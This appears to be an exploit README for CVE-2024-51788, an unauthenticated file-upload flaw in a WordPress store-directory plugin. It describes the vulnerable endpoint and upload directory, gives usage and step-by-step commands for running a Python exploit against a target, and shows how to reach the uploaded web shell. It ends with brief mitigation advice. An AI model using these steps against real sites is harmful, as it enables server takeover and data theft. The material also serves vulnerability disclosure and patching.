Share 
## https://sploitus.com/exploit?id=7209410C-E438-57A1-8A54-E628D55E043A
# ๐Ÿ’€ CVE-2024-51788 - WordPress The Novel Design Store Directory Plugin <= 4.3.0 - Unauthenticated Arbitrary File Upload

## ๐Ÿšจ Overview
**CVE-2024-51788** is a newly disclosed **critical** vulnerability affecting the **The Novel Design Store Directory** WordPress plugin (**<= v4.3.0**). This flaw allows **unauthenticated attackers** to upload arbitrary files, including **malicious web shells**, leading to **Remote Code Execution (RCE)** on the affected server.

๐Ÿ”ด **Severity:** 10.0 / 10 (Critical)  
๐Ÿ“… **Published:** November 11, 2024  
๐Ÿ“… **Updated:** November 12, 2024  
๐Ÿ”— **CWE ID:** [CWE-434 - Unrestricted File Upload](https://cwe.mitre.org/data/definitions/434.html)  

---
## ๐Ÿ›‘ Impact
โœ… **Full server compromise** - Attackers can gain complete control over the website and execute arbitrary commands.  
โœ… **Data Breach** - Access and modification of sensitive information.  
โœ… **Website defacement & malware injection** - Attackers can modify website content or plant malware.  
โœ… **Privilege escalation** - Attackers may exploit this to escalate privileges and move laterally within the network.  

---
## โšก Exploit Details
The vulnerability exists due to **improper validation** of uploaded files in the **wp-admin/options-general.php?page=licence** endpoint. Attackers can upload **malicious PHP scripts** into the **/wp-content/plugins/noveldesign-store-directory/images/** directory without authentication, ultimately leading to **Remote Code Execution (RCE)**.

๐Ÿšจ **Key factors enabling the attack:**
- No authentication required.
- Unrestricted file upload.
- The uploaded files are directly executable.

### ๐Ÿ› ๏ธ Exploit Script Overview
A Python-based exploit script has been developed to automate the exploitation process. This script:

โœ… **Bypasses authentication** using random user agents & cookies.  
โœ… **Uploads a malicious PHP shell** directly to the server.  
โœ… **Executes arbitrary commands** on the compromised machine.  
โœ… **Automatically detects if the target is vulnerable.**  

๐Ÿ“Œ **Exploit Usage:**
```bash

usage: CVE-2024-51788.py [-h] -u URL

Exploit script for CVE-2024-51788 # by Nxploit Khaled Alenazi.

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL


```
๐Ÿ” If successful, the shell will be uploaded to:
```
/wp-content/plugins/noveldesign-store-directory/images/
```

---
## ๐Ÿš€ Exploitation Steps
1๏ธโƒฃ **Clone the repository:**  
```bash
git clone https://github.com/Nxploit/CVE-2024-51788.git
cd CVE-2024-51788
```
2๏ธโƒฃ **Run the exploit script:**  
```bash
python3 CVE-2024-51788.py -u http://target-wordpress-site.com
```
3๏ธโƒฃ **Access the uploaded shell:**  
```bash
http://target-wordpress-site.com/wp-content/plugins/noveldesign-store-directory/images/shell.php
```
### To ensure the exploit script runs smoothly, install the required dependencies using the following command: 

```
pip install requests argparse urllib3

```
---
## ๐Ÿ›ก๏ธ Mitigation & Fixes
๐Ÿ”น **Update to the latest version** of The Novel Design Store Directory plugin.  
๐Ÿ”น **Restrict file upload permissions** to allow only safe file types.  

  


---
## ๐Ÿ“ Disclaimer
โš ๏ธ **This exploit is for educational and research purposes only.** Unauthorized use of this exploit against systems without proper authorization is **illegal**. The author is not responsible for any misuse of this information.

---
## ๐Ÿ”— References
- [NVD CVE-2024-51788](https://nvd.nist.gov/vuln/detail/CVE-2024-51788)  
- [Patchstack Advisory](https://patchstack.com/database/vulnerability/noveldesign-store-directory)  

---
๐Ÿ“Œ
    **_By: Nxploit | Khaled Alenazi_** | ๐Ÿ”ฅ Follow for more security research and exploits!